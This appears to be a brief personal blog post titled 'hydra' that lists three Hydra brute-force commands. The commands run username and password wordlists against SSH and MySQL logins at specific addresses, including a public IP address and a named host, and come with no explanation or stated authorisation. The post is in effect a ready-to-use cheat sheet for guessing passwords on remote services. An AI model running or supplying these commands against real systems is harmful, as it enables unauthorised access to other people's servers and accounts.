0
点赞
收藏
分享

微信扫一扫

hydra

穿裙子的程序员 2022-05-19 阅读 54

hydra -L user.txt -P pass.txt -o savessh.log -f -vV -e ns 10.0.5.24 ssh

hydra -L user.txt -P sup.txt -o savessh.log -f -vV -e ns 113.105.144.130 mysql

hydra -l root -P pass.txt -t 6 -V  mysql://v.v.io:3306




举报

相关推荐

0 条评论